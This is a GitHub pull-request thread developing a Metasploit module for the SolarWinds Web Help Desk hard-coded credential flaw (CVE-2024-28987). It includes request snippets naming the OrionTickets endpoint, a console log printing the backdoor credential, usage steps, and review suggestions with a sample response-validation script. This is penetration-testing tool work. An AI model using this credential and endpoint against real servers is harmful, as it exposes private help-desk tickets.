SolarWinds Web Help Desk Backdoor (CVE-2024-28987) Module #19499
base: master
Conversation
Initial draft
Documentation
minor improvements
added check method
I've added a
```ruby
def auth
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
```
Does this endpoint support pagination?
I'm not sure if this specific endpoint supports pagination, but I saw some other endpoints that might support it. I'll have to play around some more to see if there's another endpoint that could be used instead.
```ruby
    body = @auth.body
    fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless body.include?('shortSubject')
```
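Review bot: the failure message concatenates the whole `@auth` response via `to_s`, so a non-matching reply dumps the complete headers and body into the fail_with output; reporting `@auth.code` and the body length would be enough to diagnose the mismatch. The `body.include?('shortSubject')` substring test is also satisfied by any page that merely mentions the word (an HTML error or login page could do so); parsing the body as JSON and requiring an array of ticket objects would turn this into a real indicator rather than a string match.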
It'd be great to persist this in the database as a vulnerability, example:
```ruby
vprint_good("Detected DLSw protocol")
report_service(
  host: rhost,
  port: rport,
  proto: 'tcp',
  name: 'dlsw'
)
# TODO: check that response has something that truly indicates it is vulnerable
# and not simply that it responded
unless response[18..72].scan(/\x00/).length == 54
  print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")
  report_vuln(
    host: rhost,
    port: rport,
    name: name,
    refs: references,
    info: "Module #{fullname} collected #{response.length} bytes"
  )
  Exploit::CheckCode::Vulnerable
end
```
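The TODO in the DLSw snippet above (check that the response truly indicates the vulnerability, not merely that the endpoint answered) is the same weakness as the `body.include?('shortSubject')` test in this PR. The following stand-alone Ruby example is added here and is not code from the PR or from Metasploit; it runs without the framework, uses constructed sample responses (not captured from any real Web Help Desk instance), and uses plain symbols in place of the `Exploit::CheckCode` constants. It contrasts the substring test with a check that parses the body as JSON and requires an array of ticket objects, and bounds what is shown the way the `TICKETSTODUMP` option described later in the thread does.

```ruby
require 'json'

# Constructed sample responses (not captured from any real Web Help Desk instance).
TICKET_LIST_BODY = JSON.generate([
  { 'id' => 101, 'shortSubject' => 'Printer offline', 'clientTechId' => 7 },
  { 'id' => 102, 'shortSubject' => 'VPN access request', 'clientTechId' => 3 },
  { 'id' => 103, 'shortSubject' => 'Password reset', 'clientTechId' => 7 }
])
HTML_LOGIN_BODY = '<html><body>Sign in to view a ticket. ' \
                  'Fields: shortSubject, detail, status.</body></html>'
EMPTY_LIST_BODY = '[]'

# The substring test as written in the PR: satisfied by any body that mentions the word.
def naive_check(body)
  body.include?('shortSubject')
end

# Stronger check: only a 200 carrying a JSON array of ticket objects counts as proof.
# Result symbols stand in for Metasploit's Exploit::CheckCode constants (assumed mapping:
# :vulnerable => Vulnerable, :appears => Appears, :safe => Safe, :unknown => Unknown).
def classify_ticket_response(status, body)
  return :safe if [401, 403].include?(status)   # endpoint demands authentication
  return :unknown unless status == 200           # 404, 5xx, redirects: no conclusion
  tickets = begin
    JSON.parse(body)
  rescue JSON::ParserError
    return :safe                                 # HTML page, error page, plain text
  end
  return :safe unless tickets.is_a?(Array)
  return :appears if tickets.empty?              # answered unauthenticated, but holds no data
  tickets.all? { |t| t.is_a?(Hash) && t.key?('shortSubject') } ? :vulnerable : :safe
end

# Bound what is shown, as the module's TICKETSTODUMP option does; only id and subject are kept.
def summarize_tickets(body, limit)
  tickets = JSON.parse(body)
  shown = tickets.first(limit).map { |t| { 'id' => t['id'], 'shortSubject' => t['shortSubject'] } }
  { 'total' => tickets.length, 'shown' => shown }
end

if __FILE__ == $PROGRAM_NAME
  puts "naive check on HTML page:   #{naive_check(HTML_LOGIN_BODY)}"                     # true (false positive)
  puts "strict check on HTML page:  #{classify_ticket_response(200, HTML_LOGIN_BODY)}"   # safe
  puts "strict check on ticket list: #{classify_ticket_response(200, TICKET_LIST_BODY)}" # vulnerable
  puts summarize_tickets(TICKET_LIST_BODY, 2).inspect
end
```

The `:appears` branch is the judgement call: an empty array still shows the endpoint served data without credentials, so it is reported as likely rather than confirmed, which is also what a module should persist with `report_vuln` rather than a bare "it responded".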
I guess technically we should store the credential too?
metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb
Lines 126 to 151 in 7b47050
```ruby
def report_cred(opts)
  service_data = {
    address: rhost,
    port: rport,
    service_name: 'webaccess',
    protocol: 'tcp',
    workspace_id: myworkspace_id
  }

  credential_data = {
    origin_type: :service,
    module_fullname: fullname,
    username: opts[:user],
    private_data: opts[:password],
    private_type: :password
  }.merge(service_data)

  login_data = {
    last_attempted_at: DateTime.now,
    core: create_credential(credential_data),
    status: opts[:status],
    proof: opts[:proof]
  }.merge(service_data)

  create_credential_login(login_data)
end
```
I'll just run this by the team tomorrow to confirm if it's the convention to register hard-coded app creds into Metasploit's database or not 👍
Thank you for the feedback, I've added report_service and report_vuln:
```
msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > services
Services
========
host             port  proto  name                      state  info
----             ----  -----  ----                      -----  ----
192.168.217.145  8443  tcp    solarwinds web help desk  open

msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > vulns -i
Vulnerabilities
===============
Timestamp                Host             Name                                         References                                         Information
---------                ----             ----                                         ----------                                         -----------
2024-09-26 03:56:23 UTC  192.168.217.145  SolarWinds Web Help Desk Backdoor (CVE-2024-2898  CVE-2024-28987,URL-https://www.solarwinds.com/tr  The backdoor helpdeskIntegrationUser:dev-C4F8025
                                          7)                                           ust-center/security-advisories/cve-2024-28987,UR   E7 works.
                                                                                       L-https://support.solarwinds.com/SuccessCenter/s
                                                                                       /article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-
                                                                                       2,URL-https://www.horizon3.ai/attack-research/cv
                                                                                       e-2024-28987-solarwinds-web-help-desk-hardcoded-
                                                                                       credential-vulnerability-deep-dive/
```
added report_vuln, report_service, limited console output
Use TICKETSTODUMP instead of n characters
Updated documentation
Note: This is still a draft.
This is a new module which exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 to retrieve all tickets from the system.
Verification Steps

```
msfconsole
use auxiliary/gather/solarwinds_webhelpdesk_backdoor
set RHOSTS <IP>
run
```
Successfully tested on
Notes
I still need to add error handling, etc., but I wanted to get the initial draft published already.